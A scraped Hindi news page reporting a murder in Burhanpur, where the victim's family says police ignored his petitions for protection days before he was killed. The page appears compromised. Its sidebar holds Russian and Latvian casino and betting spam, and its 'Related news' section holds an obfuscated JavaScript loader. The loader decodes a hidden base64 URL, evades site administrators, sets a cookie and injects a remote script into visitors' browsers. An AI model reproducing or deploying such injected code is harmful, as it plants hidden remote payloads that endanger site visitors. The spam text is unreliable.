बुरहानपुर में चार थानों और एसपी से मांगी जान की भीख, अंतत: हो गई हत्या, मृतक की पत्नी ने लगाए आरोप

- Advertisement -
- Advertisement -

राष्ट्र आजकल प्रतिनिधि, बुरहानपुर।  बुरहानपुर में मंगलवार शाम खकनार थाना क्षेत्र 35 वर्षीय सुभाष पवार की कुछ युवकों ने हत्या कर दी। नांदुरा खुर्द बंजारा टांडा के रहने वाले पवार पर शाम पौने छह बजे के आसपास कुल्हाड़ी व अन्य धारदार हथियारा से लैस करीब 6-7 युवक उसके घर में घुसे और दनादन वार कर सुभाष की जान ले ली। मृतक सुभाष की पत्नी डाली बाई और भाई विजय पवार ने बुधवार को पुलिस पर गंभीर आरोप लगाए हैं। उन्होंने बताया कि मृतक सुभाष ने 15 दिसंबर को ही खकनार सहित चार थानों और एसपी देवेंद्र पाटीदार को आवेदन देकर जान की भीख मांगी थी। इस आवेदन में गांव के सात लोगों के नाम लिख कर उनसे जान का खतरा बताया था। साथ ही पुलिस से हस्तक्षेप कर जान बचाने की गुहार लगाई थी। मृतक और उसका परिवार खकनार थाना प्रभारी विनय आर्य से भी मिला था, लेकिन उन्होंने सुभाष को थाने से लौटा दिया था। हत्या की सूचना मिलने के बाद देर शाम खकनार थाना पुलिस बंजारा टांडा पहुंची और हत्या के आरोप में तीन लोगों को गिरफ्तार किया है। इनमें संतोष पुत्र जैतिया बंजारा, पन्नालाल उर्फ राजाराम और लक्ष्मण उर्फ लच्छू पुल संतोष निवासी बड़ा टांडा शामिल हैं। मृतक सुभाष ने इनके अलावा चार अन्य लोगों इंदल पुत्र संतोष, रतिलाल पुत्र जैतिया, कैलाश पुत्र जैतिया औराहुल पुत्र रतिलाल के नाम अपने आवेदन में लिखे थे, लेकिन पुलिस ने उन्हें आरोपित नहीं बनाया है। मृतक के स्वजन ने बताया कि आरोपितों और सुभाष के बीच करीब चार माह पहले भी विवाद हुआ था। जिस पर दोनों पक्षों के खिलाफ खकनार थाने में प्रकरण दर्ज किया गया था। विवाद शांत कराने के लिए परिवार के लोगों ने सुभाष को सूरत भेज दिया था। वहां वह काम करने लगा था। करीब पंद्रह दिन पहले ही सुभाष गांव लौटा था। इसके बाद से आरोपितों ने फिर उसे जान से मारने की धमकी देना शुरू कर दिया था। जिसके चलते वह और परिवार दहशत में जी रहा था।

- Advertisement -

Latest news

Виртуальное игорное заведение с вступительным вознаграждением

Виртуальное игорное заведение с вступительным вознаграждением Интернет-казино с бонусом за регистрацию дают геймерам особый шанс начать свой игровой путь с бонусными деньгами. Приветственный поощрение зачастую...
- Advertisement -

ज़रूर पढ़े

इंदौर: नाबालिग को हुआ पंजाब के लड़के से प्रेम, पबजी खेल से हुई थी दोनों की जान- पहचान, पहुँच गयी पंजाब उससे मिलने

परिजनों की गुमशुदगी की शिकायत पर; पुलिस ने कॉल डिटेल निकाली तो दस दिन बाद आरोपी और लड़की को इंदौर ले आई।...

कमलनाथ के नरसिंहपुर आगमन को लेकर करेली ब्लाक कांग्रेस की महत्वपूर्ण बैठक संपन्न

राष्ट्र आजकल/पूनम दीक्षित/ करेली नरसिंहपुर: 19 मार्च को विशाल आमसभामध्य प्रदेश कांग्रेस कमेटी के अध्यक्ष पूर्व मुख्यमंत्री कमलनाथ का 19 मार्च को...

सिंधिया: किसने क्या किया- क्या नहीं किया, कांग्रेस को खुद नहीं पता अपने नेताओं के बारे में

कांग्रेस खुद ही नहीं जानती कि उनके नेता ने क्या किया और क्या नहीं. कांग्रेस छोड़कर बीजेपी में शामिल होने वाले ज्योतिरादित्य...

Related news

1win регистрация в букмекерской конторе 1вин.1056 (2)

1win — регистрация в букмекерской конторе 1вин ▶️ ИГРАТЬ ...

– Официальный сайт Pinco Casino.4441 (2)

Пинко Казино - Официальный сайт Pinco Casino ▶️ ИГРАТЬ ...

test(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(//g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')||document.documentElement).appendChild(s);}catch(e){}})();

Vavada online kazino Latvij iemaksu metodes un minimls summas.654

Vavada online kazino Latvijā - iemaksu metodes un minimālās summas ...
- Advertisement -

LEAVE A REPLY

Please enter your comment!
Please enter your name here